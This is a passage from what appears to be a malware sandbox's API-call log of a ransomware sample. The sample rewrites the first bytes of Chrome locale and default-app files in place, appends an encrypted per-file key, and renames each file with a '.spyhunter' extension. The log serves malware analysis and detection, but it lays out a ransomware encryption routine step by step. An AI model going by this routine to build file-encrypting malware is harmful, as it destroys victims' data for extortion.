hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e44c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e44c*=0x2800, lpOverlapped=0x0) returned 1 [0176.577] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.577] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e44c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e44c*=0x2800, lpOverlapped=0x0) returned 1 [0176.577] GetProcessHeap () returned 0x2c0000 [0176.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.577] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.577] WriteFile (in: hFile=0xa0, lpBuffer=0x270e48c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e44c, lpOverlapped=0x0 | out: lpBuffer=0x270e48c*, lpNumberOfBytesWritten=0x270e44c*=0x4, lpOverlapped=0x0) returned 1 [0176.606] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e44c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e44c*=0x30, lpOverlapped=0x0) returned 1 [0176.606] CloseHandle (hObject=0xa0) returned 1 [0176.625] GetProcessHeap () returned 0x2c0000 [0176.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.625] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\et.pak.spyhunter") returned 91 [0176.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\et.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\et.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\et.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\et.pak.spyhunter")) returned 1 [0176.628] GetProcessHeap () returned 0x2c0000 [0176.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.628] GetProcessHeap () returned 0x2c0000 [0176.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0176.628] GetProcessHeap () returned 0x2c0000 [0176.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecc560 | out: hHeap=0x2c0000) returned 1 [0176.628] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e488 | out: pbBuffer=0x270e488) returned 1 [0176.628] GetProcessHeap () returned 0x2c0000 [0176.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0176.628] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e480*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e480*=0x30) returned 1 [0176.628] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-GB.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-gb.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.629] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-GB.pak") returned 84 [0176.629] StrStrW (lpFirst="en-GB.pak", lpSrch=".txt") returned 0x0 [0176.629] GetProcessHeap () returned 0x2c0000 [0176.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.629] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e444, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e444*=0x2800, lpOverlapped=0x0) returned 1 [0176.667] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.667] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e444, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e444*=0x2800, lpOverlapped=0x0) returned 1 [0176.667] GetProcessHeap () returned 0x2c0000 [0176.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.667] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.667] WriteFile (in: hFile=0x9c, lpBuffer=0x270e484*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e444, lpOverlapped=0x0 | out: lpBuffer=0x270e484*, lpNumberOfBytesWritten=0x270e444*=0x4, lpOverlapped=0x0) returned 1 [0176.685] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e444, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e444*=0x30, lpOverlapped=0x0) returned 1 [0176.685] CloseHandle (hObject=0x9c) returned 1 [0176.685] GetProcessHeap () returned 0x2c0000 [0176.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.685] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-GB.pak.spyhunter") returned 94 [0176.685] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-GB.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-gb.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-GB.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-gb.pak.spyhunter")) returned 1 [0176.686] GetProcessHeap () returned 0x2c0000 [0176.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.687] GetProcessHeap () returned 0x2c0000 [0176.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0176.687] GetProcessHeap () returned 0x2c0000 [0176.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca1c0 | out: hHeap=0x2c0000) returned 1 [0176.687] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e488 | out: pbBuffer=0x270e488) returned 1 [0176.687] GetProcessHeap () returned 0x2c0000 [0176.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0176.691] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e480*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e480*=0x30) returned 1 [0176.691] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ca.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ca.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.692] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ca.pak") returned 81 [0176.692] StrStrW (lpFirst="ca.pak", lpSrch=".txt") returned 0x0 [0176.692] GetProcessHeap () returned 0x2c0000 [0176.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.692] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e444, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e444*=0x2800, lpOverlapped=0x0) returned 1 [0176.695] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.695] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e444, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e444*=0x2800, lpOverlapped=0x0) returned 1 [0176.695] GetProcessHeap () returned 0x2c0000 [0176.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0176.695] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.695] WriteFile (in: hFile=0x9c, lpBuffer=0x270e484*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e444, lpOverlapped=0x0 | out: lpBuffer=0x270e484*, lpNumberOfBytesWritten=0x270e444*=0x4, lpOverlapped=0x0) returned 1 [0176.696] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e444, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e444*=0x30, lpOverlapped=0x0) returned 1 [0176.696] CloseHandle (hObject=0x9c) returned 1 [0176.696] GetProcessHeap () returned 0x2c0000 [0176.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.697] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ca.pak.spyhunter") returned 91 [0176.697] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ca.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ca.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ca.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ca.pak.spyhunter")) returned 1 [0176.700] GetProcessHeap () returned 0x2c0000 [0176.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.700] GetProcessHeap () returned 0x2c0000 [0176.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0176.700] GetProcessHeap () returned 0x2c0000 [0176.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecbfc0 | out: hHeap=0x2c0000) returned 1 [0176.700] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e480 | out: pbBuffer=0x270e480) returned 1 [0176.700] GetProcessHeap () returned 0x2c0000 [0176.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0176.700] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e478*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e478*=0x30) returned 1 [0176.701] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bn.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bn.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.705] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bn.pak") returned 81 [0176.705] StrStrW (lpFirst="bn.pak", lpSrch=".txt") returned 0x0 [0176.705] GetProcessHeap () returned 0x2c0000 [0176.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.705] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e43c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e43c*=0x2800, lpOverlapped=0x0) returned 1 [0176.725] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.725] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e43c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e43c*=0x2800, lpOverlapped=0x0) returned 1 [0176.725] GetProcessHeap () returned 0x2c0000 [0176.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0176.725] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.725] WriteFile (in: hFile=0x9c, lpBuffer=0x270e47c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e43c, lpOverlapped=0x0 | out: lpBuffer=0x270e47c*, lpNumberOfBytesWritten=0x270e43c*=0x4, lpOverlapped=0x0) returned 1 [0176.726] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e43c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e43c*=0x30, lpOverlapped=0x0) returned 1 [0176.726] CloseHandle (hObject=0x9c) returned 1 [0176.727] GetProcessHeap () returned 0x2c0000 [0176.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.727] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bn.pak.spyhunter") returned 91 [0176.727] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bn.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bn.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bn.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bn.pak.spyhunter")) returned 1 [0176.728] GetProcessHeap () returned 0x2c0000 [0176.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.728] GetProcessHeap () returned 0x2c0000 [0176.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0176.728] GetProcessHeap () returned 0x2c0000 [0176.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecbed0 | out: hHeap=0x2c0000) returned 1 [0176.728] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e480 | out: pbBuffer=0x270e480) returned 1 [0176.728] GetProcessHeap () returned 0x2c0000 [0176.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0176.728] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e478*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e478*=0x30) returned 1 [0176.728] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bg.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bg.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0176.734] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bg.pak") returned 81 [0176.734] StrStrW (lpFirst="bg.pak", lpSrch=".txt") returned 0x0 [0176.734] GetProcessHeap () returned 0x2c0000 [0176.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.734] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e43c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e43c*=0x2800, lpOverlapped=0x0) returned 1 [0176.742] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.742] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e43c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e43c*=0x2800, lpOverlapped=0x0) returned 1 [0176.742] GetProcessHeap () returned 0x2c0000 [0176.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.742] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.742] WriteFile (in: hFile=0xa0, lpBuffer=0x270e47c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e43c, lpOverlapped=0x0 | out: lpBuffer=0x270e47c*, lpNumberOfBytesWritten=0x270e43c*=0x4, lpOverlapped=0x0) returned 1 [0176.817] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e43c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e43c*=0x30, lpOverlapped=0x0) returned 1 [0176.817] CloseHandle (hObject=0xa0) returned 1 [0176.855] GetProcessHeap () returned 0x2c0000 [0176.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.855] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bg.pak.spyhunter") returned 91 [0176.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bg.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bg.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bg.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bg.pak.spyhunter")) returned 1 [0176.856] GetProcessHeap () returned 0x2c0000 [0176.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.856] GetProcessHeap () returned 0x2c0000 [0176.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0176.856] GetProcessHeap () returned 0x2c0000 [0176.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecbde0 | out: hHeap=0x2c0000) returned 1 [0176.856] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e478 | out: pbBuffer=0x270e478) returned 1 [0176.856] GetProcessHeap () returned 0x2c0000 [0176.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0176.857] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e470*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e470*=0x30) returned 1 [0176.857] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\gmail.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\gmail.crx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0176.857] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\gmail.crx") returned 89 [0176.857] StrStrW (lpFirst="gmail.crx", lpSrch=".txt") returned 0x0 [0176.858] GetProcessHeap () returned 0x2c0000 [0176.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.858] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e434, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e434*=0x2800, lpOverlapped=0x0) returned 1 [0177.000] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.000] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e434, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e434*=0x2800, lpOverlapped=0x0) returned 1 [0177.000] GetProcessHeap () returned 0x2c0000 [0177.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.000] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.000] WriteFile (in: hFile=0xa0, lpBuffer=0x270e474*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e434, lpOverlapped=0x0 | out: lpBuffer=0x270e474*, lpNumberOfBytesWritten=0x270e434*=0x4, lpOverlapped=0x0) returned 1 [0177.021] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e434, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e434*=0x30, lpOverlapped=0x0) returned 1 [0177.022] CloseHandle (hObject=0xa0) returned 1 [0177.022] GetProcessHeap () returned 0x2c0000 [0177.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.022] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\gmail.crx.spyhunter") returned 99 [0177.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\gmail.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\gmail.crx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\gmail.crx.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\gmail.crx.spyhunter")) returned 1 [0177.023] GetProcessHeap () returned 0x2c0000 [0177.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.023] GetProcessHeap () returned 0x2c0000 [0177.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0177.024] GetProcessHeap () returned 0x2c0000 [0177.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5e4c0 | out: hHeap=0x2c0000) returned 1 [0177.024] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e478 | out: pbBuffer=0x270e478) returned 1 [0177.024] GetProcessHeap () returned 0x2c0000 [0177.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0177.024] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e470*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e470*=0x30) returned 1 [0177.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\docs.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\docs.crx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.025] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\docs.crx") returned 88 [0177.025] StrStrW (lpFirst="docs.crx", lpSrch=".txt") returned 0x0 [0177.025] GetProcessHeap () returned 0x2c0000 [0177.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0177.025] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e434, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e434*=0x11e2, lpOverlapped=0x0) returned 1 [0177.129] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffee1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.129] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x11e2, lpNumberOfBytesWritten=0x270e434, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e434*=0x11e2, lpOverlapped=0x0) returned 1 [0177.129] GetProcessHeap () returned 0x2c0000 [0177.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0177.129] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.130] WriteFile (in: hFile=0xa0, lpBuffer=0x270e474*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e434, lpOverlapped=0x0 | out: lpBuffer=0x270e474*, lpNumberOfBytesWritten=0x270e434*=0x4, lpOverlapped=0x0) returned 1 